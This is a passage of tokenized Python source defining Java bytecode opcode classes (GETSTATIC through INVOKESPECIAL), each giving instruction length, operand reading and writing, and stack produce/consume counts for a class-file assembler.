descriptor ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . field . class_name , self . field . name , self . field . name_and_type . descriptor ) <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> field = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> return cls ( <EOL> field . class_name , <EOL> field . name , <EOL> field . name_and_type . descriptor . bytes . decode ( '<STR_LIT>' ) <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . field ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . field . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class GETSTATIC ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name , field_name , descriptor ) : <EOL> super ( GETSTATIC , self ) . __init__ ( ) <EOL> self . field = Fieldref ( class_name , field_name , descriptor ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . field . class_name , self . field . name , self . field . name_and_type . descriptor ) <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> field = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> return cls ( <EOL> field . class_name , <EOL> field . name , <EOL> field . name_and_type . descriptor . bytes . decode ( '<STR_LIT>' ) <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . field ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . field . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class GOTO ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( GOTO , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class GOTO_W ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( GOTO_W , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:5> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s4 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s4 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class I2B ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( I2B , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class I2C ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( I2C , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class I2D ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( I2D , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class I2F ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( I2F , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class I2L ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( I2L , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class I2S ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( I2S , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class IADD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IADD , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IALOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IALOAD , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IAND ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IAND , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IASTORE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IASTORE , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:3> <EOL> class ICONST_M1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ICONST_M1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ICONST_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ICONST_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ICONST_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ICONST_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ICONST_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ICONST_2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ICONST_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ICONST_3 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ICONST_4 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ICONST_4 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ICONST_5 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ICONST_5 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class IDIV ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IDIV , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IF_ACMPEQ ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IF_ACMPEQ , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IF_ACMPNE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IF_ACMPNE , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IF_ICMPEQ ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IF_ICMPEQ , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IF_ICMPGE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IF_ICMPGE , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IF_ICMPGT ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IF_ICMPGT , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IF_ICMPLE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IF_ICMPLE , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IF_ICMPLT ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IF_ICMPLT , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IF_ICMPNE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IF_ICMPNE , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class IFEQ ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IFEQ , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class IFGE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IFGE , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class IFGT ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IFGT , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class IFLE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IFLE , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class IFLT ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IFLT , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class IFNE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IFNE , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class IFNONNULL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IFNONNULL , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class IFNULL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , offset ) : <EOL> super ( IFNULL , self ) . __init__ ( ) <EOL> self . offset = offset <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . offset <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> offset = reader . read_s2 ( ) <EOL> return cls ( offset ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_s2 ( self . offset ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class IINC ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , index , const ) : <EOL> super ( IINC , self ) . __init__ ( ) <EOL> self . index = index <EOL> self . const = const <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . index , self . const ) <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> index = reader . read_u1 ( ) <EOL> const = reader . read_u1 ( ) <EOL> return cls ( index , const ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . index ) <EOL> writer . write_u1 ( self . const ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ILOAD ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , var ) : <EOL> super ( ILOAD , self ) . __init__ ( ) <EOL> self . var = var <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . var <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> var = reader . read_u1 ( ) <EOL> return cls ( var ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u1 ( self . var ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ILOAD_0 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ILOAD_0 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ILOAD_1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ILOAD_1 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ILOAD_2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ILOAD_2 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class ILOAD_3 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( ILOAD_3 , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:0> <EOL> class IMPDEP1 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IMPDEP1 , self ) . __init__ ( ) <EOL> class IMPDEP2 ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IMPDEP2 , self ) . __init__ ( ) <EOL> class IMUL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( IMUL , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:2> <EOL> class INEG ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> super ( INEG , self ) . __init__ ( ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class INSTANCEOF ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name ) : <EOL> super ( INSTANCEOF , self ) . __init__ ( ) <EOL> self . klass = Classref ( class_name ) <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % self . klass . class_name <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> klass = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> return cls ( <EOL> klass . name . bytes . decode ( '<STR_LIT>' ) , <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . klass ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . klass . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> <EOL> class INVOKEDYNAMIC ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name , method_name , descriptor ) : <EOL> super ( INVOKEDYNAMIC , self ) . __init__ ( ) <EOL> self . method = Methodref ( class_name , method_name , descriptor ) <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . method . class_name , self . method . name , self . method . name_and_type . descriptor ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:5> <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> method = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> reader . read_u2 ( ) <EOL> return cls ( <EOL> method . klass . name . bytes . decode ( '<STR_LIT>' ) , <EOL> method . name_and_type . name . bytes . decode ( '<STR_LIT>' ) , <EOL> method . name_and_type . descriptor . bytes . decode ( '<STR_LIT>' ) <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . method ) ) <EOL> writer . write_u2 ( <NUM_LIT:0> ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . method . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> if self . method . name_and_type . descriptor . bytes [ - <NUM_LIT:1> ] == ord ( '<STR_LIT>' ) else <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> + len ( self . method . descriptor . parameters ) <EOL> class INVOKEINTERFACE ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name , method_name , descriptor ) : <EOL> super ( INVOKEINTERFACE , self ) . __init__ ( ) <EOL> self . method = InterfaceMethodref ( class_name , method_name , descriptor ) <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . method . class_name , self . method . name , self . method . name_and_type . descriptor ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:5> <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> method = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> reader . read_u1 ( ) <EOL> reader . read_u1 ( ) <EOL> return cls ( <EOL> method . class_name , <EOL> method . name , <EOL> method . name_and_type . descriptor . bytes . decode ( '<STR_LIT>' ) , <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . method ) ) <EOL> writer . write_u1 ( len ( self . method . descriptor . parameters ) + <NUM_LIT:1> ) <EOL> writer . write_u1 ( <NUM_LIT:0> ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . method . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> if self . method . name_and_type . descriptor . bytes [ - <NUM_LIT:1> ] == ord ( '<STR_LIT>' ) else <NUM_LIT:1> <EOL> @ property <EOL> def consume_count ( self ) : <EOL> return <NUM_LIT:1> + len ( self . method . descriptor . parameters ) <EOL> class INVOKESPECIAL ( Opcode ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , class_name , method_name , descriptor ) : <EOL> super ( INVOKESPECIAL , self ) . __init__ ( ) <EOL> self . method = Methodref ( class_name , method_name , descriptor ) <EOL> def __arg_repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . method . klass . name , self . method . name_and_type . name , self . method . name_and_type . descriptor ) <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:3> <EOL> @ property <EOL> def class_name ( self ) : <EOL> return self . method . class_name <EOL> @ property <EOL> def method_name ( self ) : <EOL> return self . method . method_name <EOL> @ property <EOL> def descriptor ( self ) : <EOL> return self . method . descriptor <EOL> @ classmethod <EOL> def read_extra ( cls , reader , dump = None ) : <EOL> method = reader . constant_pool [ reader . read_u2 ( ) ] <EOL> return cls ( <EOL> method . klass . name . bytes . decode ( '<STR_LIT>' ) , <EOL> method . name_and_type . name . bytes . decode ( '<STR_LIT>' ) , <EOL> method . name_and_type . descriptor . bytes . decode ( '<STR_LIT>' ) <EOL> ) <EOL> def write_extra ( self , writer ) : <EOL> writer . write_u2 ( writer . constant_pool . index ( self . method ) ) <EOL> def resolve ( self , constant_pool ) : <EOL> self . method . resolve ( constant_pool ) <EOL> @ property <EOL> def produce_count ( self ) : <EOL> return <NUM_LIT:0> if self . method . name_and_type . descriptor . bytes [ - <NUM_LIT:1> ] == ord ( '<STR_LIT>' ) else <NUM_LIT:1> <EOL> @ property <EOL> def consume_count 